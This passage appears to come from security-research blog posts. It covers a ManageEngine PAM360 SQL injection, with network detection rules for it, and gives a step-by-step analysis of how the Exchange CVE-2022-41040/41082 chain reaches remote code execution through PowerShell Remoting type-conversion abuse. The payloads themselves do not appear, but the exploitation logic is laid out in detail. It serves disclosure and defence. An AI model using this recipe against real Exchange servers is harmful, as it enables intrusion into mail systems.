getOSTypeCriteriaForView() will call the getOSTypeCriteria() method, which uses getOSTypeList() to read all resource types from the database. It then uses these resource types to build a partial SQL statement as below: PTRX_OSTYPE in ( , , ..., ) where represents a resource type name queried from a database by the getOSTypeList() method. Then, this partial SQL statement will be returned to getOSTypeCriteriaForView() and then be returned to the getFilledString(). The getFilledString() will use this partial SQL statement to generate the final complete SQL statement and return it back to getSQLString(). However, the getOSTypeCriteria() method of the AutoLogonHelperUtil class does not sanitize the name of the resource type (returned from getOSTypeList()) for SQL injection characters before using it to create a partial SQL statement. An attacker can therefore first add a new resource type (or edit an existing resource type) with a crafted resource type name containing a malicious SQL command, and then click a menu such as “Connections” to invoke the methods of the AutoLogonHelperUtil class which will use the malicious resource type name to construct a SQL statement. This could trigger the execution of the injected SQL command. A remote authenticated attacker can exploit the vulnerability by sending a crafted request to the target server. Successful exploitation could lead to arbitrary SQL code execution in the security context of the database service, which runs with SYSTEM privileges. Detection Guidance To detect an attack exploiting this vulnerability, the detection device must monitor and parse traffic on the ports listed above. Note that the traffic is encrypted via HTTPS and should be decrypted before performing the following steps. The detection device must inspect HTTP POST requests to a Request-URI containing the following string: /AddResourceType.ve If found, the detection device must inspect each part of the multipart/form-data parts in the body of the request. In each part, the detection device must search for the Content-Disposition header and its name parameter to see if its value is “resourceType”. If found, the detection device must continue to inspect the data carried in this multipart/ form-data part to see if it contains the single-quote character “' (\x27)”. If found, the traffic should be considered malicious and an attack exploiting this vulnerability is likely underway. An example of malicious requests is shown below: Additional notes: • The string matching for the Request-URI and “POST” should be performed in a case-sensitive manner, while other string matching like “name”, “resourceType” and “Content-Disposition” should be performed in a case-insensitive manner. • The Request-URI may be URL encoded and should be decoded before applying the detection guidance. • It is possible that the single quote “' (\x27)” is naturally found in the resource type name resulting in false positives. However, in normal cases, the possibility should be low. Conclusion ManageEngine patched this and other SQL injections in September. Interestingly, the patch for PAM360 came a day after the patches for Password Manager Pro and Access Manager Plus. The vendor offers no other workarounds. Applying these updates is the only way to fully protect yourself from these bugs. Special thanks to Justin Hung and Dusan Stevanovic of the Trend Micro Research Team for providing such a thorough analysis of this vulnerability. For an overview of Trend Micro Research services please visit http://go.trendmicro.com/tis/. The threat research team will be back with other great vulnerability analysis reports in the future. Until then, follow the team on Twitter, Mastodon, LinkedIn, or Instagram for the latest in exploit techniques and security patches. ##### Control Your Types or Get Pwned: Remote Code Execution in Exchange PowerShell Backend By now you have likely already heard about the in-the-wild exploitation of Exchange Server, chaining CVE-2022-41040 and CVE-2022-41082. It was originally submitted to the ZDI program by the researcher known as “DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q from GTSC”. After successful validation, it was immediately submitted to Microsoft. They patched both bugs along with several other Exchange vulnerabilities in the November Patch Tuesday release. It is a beautiful chain, with an ingenious vector for gaining remote code execution. The tricky part is that it can be exploited in multiple ways, making both mitigation and detection harder. This blog post is divided into two main parts: · Part 1 – where we review details of the good old ProxyShell Path Confusion vulnerability (CVE-2021-34473), and we show that it can still be abused by a low-privileged user. · Part 2 – where we present the novel RCE vector in the Exchange PowerShell backend. Here’s a quick demonstration of the bugs in action: Part 1: The ProxyShell Path Confusion for Every User (CVE-2022-41040) There is a great chance that you are already familiar with the original ProxyShell Path Confusion vulnerability (CVE-2021-34473), which allowed Orange Tsai to access the Exchange PowerShell backend during Pwn2Own Vancouver 2021. If you are not, I encourage you to read the details in this blog post. Microsoft patched this vulnerability in July of 2021. However, it turned out that the patch did not address the root cause of the vulnerability. Post-patch, unauthenticated attackers are no longer able to exploit it due to the implemented access restrictions, but the root cause remains. First, let’s see what happens if we try to exploit it without authentication. HTTP Request HTTP Response As expected, a 401 Unauthorized error was returned. However, can you spot something interesting in the response? The server says that we can try to authenticate with either Basic or NTLM authentication. Let’s give it a shot. HTTP Request HTTP Response Exchange says that it is cool now! This shows us that: · The ProxyShell Path Confusion still exists, as we can reach the PowerShell backend through the autodiscover endpoints. · As the autodiscover endpoints allow the use of legacy authentication (NTLM and Basic authentication) by default, we can access those endpoints by providing valid credentials. After successful authentication, our request will be redirected to the selected backend service. Legacy authentication in Exchange is described by Microsoft here. The following screenshot presents a fragment of the table included in the previously mentioned webpage. According to the documentation and some manual testing, it seems that an Exchange instance was protected against this vulnerability if: · A custom protection mechanism was deployed that blocks the Autodiscover SSRF vector (for example, on the basis of the URL), or · If legacy authentication was blocked for the Autodiscover service. This can be done with a single command (though an Exchange Server restart is probably required): Set-AuthenticationPolicy -BlockLegacyAuthAutodiscover:$true

So far, we have discovered that an authenticated user can access the Exchange PowerShell backend. We will now proceed to the second part of this blog post to discuss how this can be exploited for remote code execution.

Part 2: PowerShell Remoting Objects Conversions – Be Careful or Be Pwned (CVE-2022-41082)

In this part, we will focus on the remote code execution vulnerability in the Exchange PowerShell backend. It is a particularly interesting vulnerability, and is based on two aspects:

·       PowerShell Remoting conversions and instantiations.
·       Exchange custom converters.

It has been a very long ride for me to understand this vulnerability fully and I find that I am still learning more about PowerShell Remoting. The PowerShell Remoting Protocol has a very extensive specifications and there are some hidden treasures in there. You may want to look at the official documentation, although I will try to guide you through the most important aspects. The discussion here should be enough to understand the vulnerability.

PowerShell Remoting Conversions Basics and Exchange Converters

There are several ways in which serialized objects can be passed to a PowerShell Remoting instance. We can divide those objects into two main categories:

·       Primitive type objects
·       Complex objects

Primitive types are not always what you would think of as “primitive”. We have some basic types here such as strings and byte arrays, but “primitive types” also include types such as URI, XMLDocument and ScriptBlock (the last of which is blocked by default in Exchange). Primitive type objects can usually be specified with a single XML tag, for example:

Complex objects have a completely different representation. Let’s take a quick look at the example from the documentation:

First, we can see that the object is specified with the “Obj” tag. Then, we use the “TN” and “T” tags to specify the object type. Here, we have the System.Drawing.Point type, which inherits from System.ValueType.

An object can be constructed in multiple ways. Shown here is probably the simplest case: direct specification of properties. The “Props” tag defines the properties of the object. You can verify this by comparing the presented serialized object and the class documentation.

One may ask: How does PowerShell Remoting deserialize objects? Sadly, there is no single, easy answer here. PowerShell Remoting implements multiple object deserialization (or conversion) mechanisms, including quite complex logic and as well as some validation. I will focus on two main aspects, which are crucial for our vulnerability.

a)     Verifying if the specified type can be deserialized
b)     Converting (deserializing) the object

Which Types Can Be Deserialized?

PowerShell Remoting will not deserialize all .NET types. By default, it allows those types related to the remoting protocol itself. However, the list of allowed types can be extended. Exchange does that through two files:

·       Exchange.types.ps1xml
·       Exchange.partial.types.ps1xml

An example entry included in those files will be presented soon.

In general, the type specified in the payload that can be deserialized is referenced as the “Target Type For Deserialization”. Let’s move to the second part.

How Is Conversion Performed?

In general, conversion is done in the following way.

·       Retrieve properties/member sets, deserializing complex values if necessary.
·       Verify that this type is allowed to be deserialized.
·       If yes, perform the conversion.

Now the most important part. PowerShell Remoting implements multiple conversion routines. In order to decide which converter should be used, the System.Management.Automation.LanguagePrimitives.FigureConversion(Type, Type) method is used. It accepts two input arguments:

·       Type fromType – the type from which the object will be obtained (for example, string or byte array).
·       Type toType – the target type for deserialization.

The FigureConversion method contains logic to find a proper converter. If it is not able to find any converter, it will throw an exception.

As already mentioned, multiple converters are available. However, the most interesting for us are:

·       ConvertViaParseMethod – invokes Parse(String) method on the target type. In this case, we control the string argument.
·       ConvertViaConstructor – invokes the single-argument constructor that accepts an argument of type fromType. In this case, we can control the argument, but limitations apply.
·       ConvertViaCast – invokes the proper cast operator, which could be an implicit or explicit cast.
·       ConvertViaNoArgumentConstructor – invokes the no-argument constructor and sets the public properties using reflection.
·       CustomConverter – there are also some custom converters specified.

As we can see, these conversions are very powerful and provide a strong reflection primitive. In fact, some of them were already mentioned in the well-known Friday the 13th JSON Attacks Black Hat paper. As we have mentioned, though, the toType is validated and we are not able to use these converters to instantiate objects of arbitrary type. That would certainly be a major security hole.

SerializationTypeConverter – Exchange Custom Converter

Let’s have a look at one particular item specified in the Exchange.types.ps1xml file:

There are several basic things that we can learn from this XML fragment:

·       Microsoft.Exchange.Data.IPvxAddress class is included in the list of the allowed target types.
·       The TargetTypeForDeserialization member gives the full class name.
·       A custom type converter is defined: Microsoft.Exchange.Data.SerializationTypeConverter

The SerializationTypeConverter wraps the BinaryFormatter serializer with ExchangeBinaryFormatterFactory. That way, the BinaryFormatter instance created will make use of the allow and block lists.

To sum up, some of our types (or members) can be retrieved through BinaryFormatter deserialization. Those types must be included in the SerializationTypeConverter allowlist, though. Moreover, custom converters are last-resort converters. Before they are used, PowerShell Remoting will try to retrieve the object through a constructor or a Parse method.

It is high time to show you the RCE payload and see what happens during the conversion.

This XML fragment presents the specification of the “-Identity” argument of the “Get-Mailbox” Exchange Powershell cmdlet. We have divided the payload into three sections: Object type, Properties, and Payload.

·       Object type section – specifies that there will be an object of type System.ServiceProcess.ServiceController.
·       Properties section – specifies the properties of the object. One thing that should catch your attention here is the property with the name TargetTypeForDeserialization. You should also notice the byte array with the name SerializationData. (Note that Powershell Remoting accepts an array of bytes in the form of a base64 encoded string).
·       Payload section – contains XML in the form of a string. The XML is a XAML deserialization gadget based on ObjectDataProvider.

Getting Control over TargetTypeForDeserialization

In the first step, we are going to focus on the Properties section of the RCE payload. Before we do that, let’s quickly look at some fragments of the deserialization code. The majority of the deserialization routines are implemented in the System.Management.Automation.InternalDeserializer class.

Let’s begin with this fragment of the ReadOneObject(out string) method:

At [1], it invokes the ReadOneDeserializedObject method, which may return an object.

At [2], the code flow continues, provided an object has been returned. We will focus on this part later.

Let’s quickly look at the ReadOneDeserializedObject method. It goes through the XML tags and executes appropriate actions, depending on the tag. However, only one line is particularly interesting for us.

At [1], it calls ReadPSObject. This happens when the tag name is equal to “Obj”.

Finally, we analyze a fragment of the ReadPSObject function.

At [1], the code retrieves the type names (strings) from the tag.

At [2], the code retrieves the properties from the tag.

At [3], the code retrieves the member set from the tag.

At [4], the code tries to read the primary type (such as string or byte array).

At [5], the code initializes a new deserialization procedure, provided that the tag is an tag.

So far, we have seen how InternalDeserializer parses the Powershell Remoting XML. As shown earlier, the Properties section of the payload contains a tag. It seems that we must look at the ReadProperties method.

At [1], the adaptedMembers property of the PSObject object is set to some PowerShell-related collection.

At [2], the property name is obtained (from the N attribute).

At [3], the code again invokes ReadOneObject in order to deserialize the nested object.

At [4], it instantiates a PSProperty object, based on the deserialized value and the property name.

Finally, at [5], it extends adaptedMembers by adding the new PSProperty. This is a crucial step, pay close attention to this.

We have two properties defined here:

·       The Name property, which is of type string and whose value is the string “Type”.

·       The TargetTypeForDeserialization property, whose value is a complex object specified as follows:

o   The type (TN tag) is System.Exception.
o   There is a value stored as a base64 encoded string, representing a byte array.

We have already seen that nested objects (defined with the Obj tag) are also deserialized with the ReadOneObject method. We have already looked at its first part (object retrieval). Now, let’s see what happens further:

At [1], the code retrieves the Type targetTypeForDeserialization through the GetTargetTypeForDeserialization method.

At [2], the code tries to retrieve a new object through the LanguagePrimitives.ConvertTo method (if GetTargetTypeForDeserialization returned anything). The targetTypeForDeserialization is one of the inputs. Another input is the object obtained with the already analyzed ReadOneDeserializedObject method.

As we have specified the object of the System.Exception type (TN tag), the GetTargetTypeForDeserialization method will return the System.Exception type. Why does the exploit use Exception? For two reasons:

·       It is included in the allowlist exchange.partial.types.ps1xml.
·       It has a custom converter registered: Microsoft.Exchange.Data.SerializationTypeConverter.

These two conditions are important because they allow the object to be retrieved using the SerializationTypeConverter, which was discussed above as a wrapper for BinaryFormatter. Note that there are also various other types available besides System.Exception that meet the two conditions mentioned here, and those types could be used as an alternative to System.Exception.

Have you ever tried to serialize an object of type Type? If yes, you probably know that it is serialized as an instance of System.UnitySerializationHolder. If you base64-decode the string provided in the Properties part of our payload, you will quickly realize that it is a System.UnitySerializationHolder with the following properties:

·       m_unityType = 0x04,
·       m_assemblyName = "PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",

To sum up, our byte array holds the object, which constructs a XamlReader type upon deserialization! That is why we want to use the SerializationTypeConverter – it allows us to retrieve an object of type Type. An immediate difficulty is apparent here, though, because Exchange’s BinaryFormatter is limited to types on the allowlist. Hence, it’s not clear why the deserialization of this byte array should succeed. Amazingly, though, System.UnitySerializationHolder is included in the SerializationTypeConverter’s list of allowed types!

Let’s see how it looks in the debugger:

Even though the targetTypeForDeserialization is Exception, LanguagePrimitives.ConvertTo returned the Type object for XamlReader (see variable obj2). This happens because the final type of the retrieved object is not verified. Finally, this Type object will be added to the adaptedMembers collection (see the ReadProperties method).

Getting Code Execution Through XamlReader, or Any Other Class

We have already deserialized the TargetTypeForDeserialization property, which is a Type object for the XamlReader type. Perfect! As you might expect, allowing users to obtain an arbitrary Type object through deserialization is not the best idea. But we still need to understand: why does PowerShell Remoting respect such a user-defined property? To begin answering this, let’s consider what the code should do next:

·       It should deserialize the tag defined after the tag (payload section of the input XML). This is a primitive string type, thus it retrieves the string.
·       It should take the type of the main object, which is defined in the tag (here: System.ServiceProcess.ServiceController).
·       It should try to create the System.ServiceProcess.ServiceController instance from the provided string.

Our goal is to switch types here. We want to perform a conversion so that the System.Windows.Markup.XamlReader type is retrieved from the string. Let’s analyze the GetTargetTypeForDeserialization function to see how this can be achieved.

At [1], it tries to retrieve an object of the PSMemberInfo type using the GetPSStandardMember method. It passes two parameters: backupTypeTable (this contains the Powershell Remoting allowed types/converters) and the hardcoded string “TargetTypeForDeserialization”.

At [2], the code retrieves the Value member from the obtained object and tries to cast it to Type. When successful, the Type object will be returned. If not, null will be returned.

GetPSStandardMember method is not easy to understand, especially when you are not familiar with the classes and methods used here. However, I will try to summarize it for you in two points:

At [1], the PSMemberSet object is retrieved through the TypeTableGetMemberDelegate method. It takes our specified type (here, System.ServiceProcess.ServiceController) and compares it against the list of allowed types. If the provided type is allowed, it will extract its properties and create the new member set.

The following screenshot presents the PSMemberSet retrieved for the System.ServiceProcess.ServiceController type:

At [2], the collection of members is created from multiple sources. If a member is not included in the basic member set (obtained from the list of allowed types), it will try to find such a member in a different source. This collection includes the adapted members, which contain the deserialized properties obtained through the Props tag.

Finally, it will try to retrieve the TargetTypeForDeserialization member from the final collection.

Let’s have a quick look at the specification of the System.ServiceProcess.ServiceController in the list of allowed types. It is defined in the default Powershell Remoting types list, located in C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml.

As you can see, this type does not have the TargetTypeForDeserialization member specified. Only the DefaultDisplayPropertySet member is defined. According to that, the targetTypeForDeserialization will be retrieved from adaptedMembers. As the Exchange SerializationTypeConverter converter allows us to retrieve a Type through deserialization, we can provide a new conversion type to adaptedMembers!

Following screenshot presents the obtained psmemberinfo, which defines the XamlReader type:

Success! GetTargetTypeForDeserialization returned the XamlReader type. You probably remember that PowerShell Remoting contains several converters. One of them allows calling the Parse(String) method. According to that, we can call the XamlReader.Parse(String) method, where the input will be equal to the string provided in the tag. Let’s quickly verify it with the debugger.

The following screenshot presents the debugging of the LanguagePrimitive.ConvertTo method. The resultType is indeed equal to the XamlReader:

The next screenshot presents the valueToConvert argument. It includes the string (XAML gadget) included in our payload:

We will soon reach the LanguagePrimitives.FigureParseConversion method. The following screenshot illustrates debugging this method. One can see that:

·       fromType is equal to String.
·       toType is equal to XamlReader.
· methodInfo contains the XamlReader.Parse(String string) method.

Yes! We have been able to get the XamlReader.Parse(String string) method through reflection! We also fully control the input that will be passed to this function. Finally, it will be invoked through the System.Management.Automation.LanguagePrimitives.ConvertViaParseMethod.ConvertWithoutCulture method, as presented in the following screenshot:

As you may be aware, XamlReader allows us to achieve code execution through loading XAML (see ysoserial.net). When we continue the process, our command gets executed.

There are also plenty of other classes besides XamlReader that could be abused in a similar way. For example, you can call the single-argument constructor of any type, so you can be creative here!

TL;DR – Summary

Getting to understand this vulnerability has been a long and complicated process. I hope that I have provided enough details for you to understand this issue. I would like to summarize the whole Microsoft Exchange chain in several points:

·       The path confusion in the Autodiscover service (CVE-2021-34473) was not fixed, but rather it was restricted to unauthenticated users. Authenticated users can still easily abuse it using Basic or NTLM authentication.

·       PowerShell Remoting allows us to perform object deserialization/conversion operations.

·       PowerShell Remoting includes several powerful converters, which can:

o   Call the public single-argument constructor of the provided type.
o   Call the public Parse(String) method of the provided type.
o   Retrieve an object through reflection.
o   Call custom converters.
o   Other conversions may be possible as well.

·       PowerShell Remoting implements a list of allowed types, so an attacker cannot (directly) invoke converters to instantiate arbitrary types.

·       However, the Exchange custom converter named SerializationTypeConverter allows us to obtain an arbitrary object of type Type.

·       This can be leveraged to fully control the type that will be retrieved through a conversion.

·       The attacker can abuse this behavior to call the Parse(String) method or the public single-argument constructor of almost any class while controlling the input argument.

·       This behavior easily leads to remote code execution. This blog post illustrates exploitation using the System.Windows.Markup.XamlReader.Parse(String) method.

It was not clear to us how Microsoft was going to approach fixing this vulnerability. Direct removal of the System.UnitySerializationHolder from the SerializationTypeConverter allowlist might cause breakage to Exchange functionality. One potential option was to restrict the returned types, for example, by restricting them to the types in the “Microsoft.Exchange.*” namespace. Accordingly, I started looking for Exchange-internal exploitation gadgets. I found more than 20 of them and reported them to Microsoft to help them with their mitigation efforts. That effort appears to have paid off. Microsoft patched the vulnerability by restricting the types that can be returned through the deserialization of System.UnitySerializationHolder according to a general allowlist, and then restricting them further according to a specific denylist. It seems that the gadgets I reported had an influence on that allowlist. I will probably detail some of those gadgets in a future blog post. Stay tuned for more…

Summary

I must admit that I was impressed with this vulnerability. The researcher clearly invested a good amount of time to fully understand the details of PowerShell Remoting, analyze Exchange custom converters, and find a way to abuse them. I had to take my analysis to another level to fully understand this bug chain and look for potential variants and alternate gadgets.

Microsoft patched these bugs in the November release. They also published a blog with additional workarounds you can employ while you test and deploy the patches. You should also make sure you have the September 2021 Cumulative Update (CU) installed. This adds the Exchange Emergency Mitigation service. This automatically installs available mitigations and sends diagnostic data to Microsoft. Still, the best method to prevent exploitation is to apply the most current security updates as they are released. We expect more Exchange patches in the coming months.

In a future blog post, I will describe some internal Exchange gadgets that can be abused to gain remote code execution, arbitrary file reads, or denial-of-service conditions. These have been reported to Microsoft, but we are still waiting for these bug reports to be addressed with patches.   Until then, you can follow me @chudypb and follow the team on Twitter or Instagram for the latest in exploit techniques and security patches.